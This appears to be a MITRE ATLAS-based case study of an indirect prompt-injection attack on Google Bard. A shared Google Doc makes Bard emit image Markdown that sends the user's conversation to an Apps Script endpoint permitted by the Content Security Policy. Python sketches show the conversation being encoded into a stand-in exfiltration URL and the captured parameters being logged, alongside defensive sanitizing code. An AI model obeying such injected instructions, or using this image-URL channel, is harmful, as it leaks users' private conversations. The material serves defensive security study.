Google Bard Conversation Exfiltration - AI Case Study

Embrace the Red demonstrated that Bard users' conversations could be exfiltrated via an indirect prompt injection. To execute the attack, a threat actor shares a Google Doc containing the prompt with the target user, who then interacts with the document via Bard and inadvertently executes the prompt. The prompt causes Bard to respond with the Markdown for an image, whose URL has the...

Overview

Case steps: 7. Steps described in the case record.

Techniques: 7. Attack methods mentioned in the case steps.

Linked CVEs: 0. Known vulnerabilities mentioned in the record.

Risk patterns

Patterns found in the case record and its linked vulnerabilities.

1. Dominant ATLAS tactic. Resource Development appears in 3 case steps.
2. Multiple attack methods. The case connects to 7 unique AI attack methods.

Procedure timeline

Steps per tactic: Resource Development 3, Initial Access 1, Execution 1, Exfiltration 1, Impact 1

Step 1
LLM Prompt Crafting
Resource Development

The researcher developed a prompt that causes Bard to include a Markdown element for an image with the user's conversation embedded in the URL as part of its responses.
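
The shape of the output that such a prompt asks for can be illustrated with a minimal Python sketch. It is not the researcher's prompt or tooling: the endpoint `https://example.invalid/collect`, the parameter name `q`, and the function `build_image_markdown` are all hypothetical and chosen only for illustration.

```python
from urllib.parse import quote, urlparse, parse_qs

# Hypothetical endpoint for illustration; not the URL used in the research.
EXFIL_ENDPOINT = "https://example.invalid/collect"


def build_image_markdown(conversation: str, endpoint: str = EXFIL_ENDPOINT) -> str:
    """Return Markdown for an image whose URL carries `conversation` in a query parameter."""
    # Percent-encode every reserved character so the text stays a single query value.
    encoded = quote(conversation, safe="")
    return f"![d]({endpoint}?q={encoded})"


markdown = build_image_markdown("user: my trip is on May 3")

# Whoever receives the image request can decode the parameter again.
url = markdown[markdown.index("(") + 1 : -1]
recovered = parse_qs(urlparse(url).query)["q"][0]
```

The point of the sketch is that an image URL is an outbound channel: any client that fetches the image also delivers the query string to the server that hosts it.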
Step 2
Acquire Infrastructure
Resource Development

The researcher identified that a Google Apps Script can be invoked via a URL on script.google.com or googleusercontent.com and can be configured not to require authentication. This allows a script to be invoked without being blocked by Bard's Content Security Policy.
Step 3
Develop Capabilities
Resource Development

The researcher wrote a Google Apps Script that logs all query parameters to a Google Doc.
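
The researcher's script was written in Google Apps Script and is not reproduced in this record. As a rough stand-in, the following Python sketch shows the same idea of recording every query parameter of an incoming request. The function name `log_query_parameters`, the in-memory list used as the log, and the example URL are assumptions made for illustration.

```python
from urllib.parse import urlparse, parse_qsl


def log_query_parameters(request_url: str, log: list[str]) -> None:
    """Append each query parameter of `request_url` to `log` as 'name=value'."""
    # parse_qsl percent-decodes names and values and preserves their order.
    for name, value in parse_qsl(urlparse(request_url).query, keep_blank_values=True):
        log.append(f"{name}={value}")


# An in-memory list stands in for the Google Doc used in the case study.
captured: list[str] = []
log_query_parameters("https://example.invalid/collect?q=hello%20world&n=1", captured)
```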
Step 4
Prompt Infiltration via Public-Facing Application
Initial Access

The researcher shares a Google Doc containing the malicious prompt with the target user. This exploits the fact that Bard Extensions allow Bard to access a user's documents.
Step 5
LLM Prompt Injection: Indirect
Execution

When the user makes a query that results in the document being retrieved, the embedded prompt is executed. The malicious prompt causes Bard to respond with Markdown for an image whose URL points to the researcher's Google Apps Script, with the user's conversation in a query parameter.
Step 6
LLM Response Rendering
Exfiltration

Bard automatically renders the Markdown, which sends the request to the Google Apps Script, exfiltrating the user's conversation. This is allowed by Bard's Content Security Policy because the URL is hosted on a Google-owned domain.
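
Why a domain-based policy lets this request through can be sketched with a simplified host allowlist check in Python. The allowlist below is hypothetical (the case record does not reproduce Bard's actual policy), and the check covers only host matching, not the full Content Security Policy matching rules. The `PLACEHOLDER_ID` path segment is likewise an illustrative stand-in.

```python
from urllib.parse import urlparse

# Hypothetical allowlist for illustration; not Bard's real policy.
ALLOWED_IMAGE_HOSTS = ("*.google.com", "*.googleusercontent.com")


def host_allowed(url: str, patterns: tuple[str, ...] = ALLOWED_IMAGE_HOSTS) -> bool:
    """Return True if the URL's host matches one of the allowlist patterns."""
    host = (urlparse(url).hostname or "").lower()
    for pattern in patterns:
        if pattern.startswith("*."):
            # A leading wildcard matches subdomains, not the bare domain itself.
            if host.endswith(pattern[1:]):
                return True
        elif host == pattern:
            return True
    return False


script_url = "https://script.google.com/macros/s/PLACEHOLDER_ID/exec?q=conversation"
other_url = "https://attacker.example/collect?q=conversation"
```

Under these assumptions `host_allowed(script_url)` is true and `host_allowed(other_url)` is false. The check confirms who owns the domain, not who controls the content served from it, which is the gap this step exploits.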
Step 7
User Harm
Impact

The user's conversation is exfiltrated, violating their privacy and possibly enabling further targeted attacks.

Mitigations

Defenses connected to the attack methods in this case.

AI Telemetry Logging

Implement logging of inputs and outputs of deployed AI models. When deploying AI agents, implement logging of the intermediate steps of agentic actions and decisions, data access and tool use, installation commands, and identity of the agent. Monitoring logs can help to detect security threats and mitigate impacts.

Additionally, having logging enabled can discourage adversaries who want to remain undetected from utilizing AI resources.

Input and Output Validation for AI Agent Components

Implement validation on inputs and outputs for the tools and data sources used by AI agents. Validation includes enforcing a common data format, schema validation, checks for sensitive or prohibited information leakage, and data sanitization to remove potential injections or unsafe code. Input and output validation can help prevent compromises from spreading in AI-enabled systems and can help secure the workflow when multiple components are chained together. Validation should be performed external to the AI agent.
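
One form of output validation relevant to this case is to inspect Markdown images in model output before rendering. The Python sketch below is a minimal illustration under stated assumptions: the trusted host `static.example.com`, the function `sanitize_images`, and the replacement text are hypothetical, and the regular expression handles only inline `![alt](url)` images, not reference-style images or raw HTML.

```python
import re
from urllib.parse import urlparse

# Matches inline Markdown images: ![alt](url "optional title")
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")

# Hypothetical exact-match allowlist of hosts that serve only static assets.
TRUSTED_IMAGE_HOSTS = frozenset({"static.example.com"})


def sanitize_images(text: str, trusted_hosts: frozenset = TRUSTED_IMAGE_HOSTS) -> str:
    """Replace Markdown images unless they are HTTPS, on a trusted host, and carry no query string."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        if parsed.scheme == "https" and parsed.hostname in trusted_hosts and not parsed.query:
            return match.group(0)  # keep the image unchanged
        return f"[image removed: {alt}]" if alt else "[image removed]"

    return IMAGE_PATTERN.sub(replace, text)


unsafe = "Hi ![x](https://script.google.com/macros/s/PLACEHOLDER_ID/exec?q=secret) there"
safe = "Logo: ![logo](https://static.example.com/logo.png)"
cleaned = sanitize_images(unsafe)
```

Running the check outside the model, as the mitigation recommends, means an injected prompt cannot talk its way past it.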

Source evidence

Original public records and references for this case.

Open the MITRE ATLAS data and public references used for this case study.

Repository: https://github.com/mitre-atlas/atlas-data
ATLAS.yaml: https://github.com/mitre-atlas/atlas-data/blob/main/dist/ATLAS.yaml
Schema: https://github.com/mitre-atlas/atlas-data/blob/main/dist/schemas/atlas_output_schema.json
Hacking Google Bard - From Prompt Injection to Data Exfiltration: https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/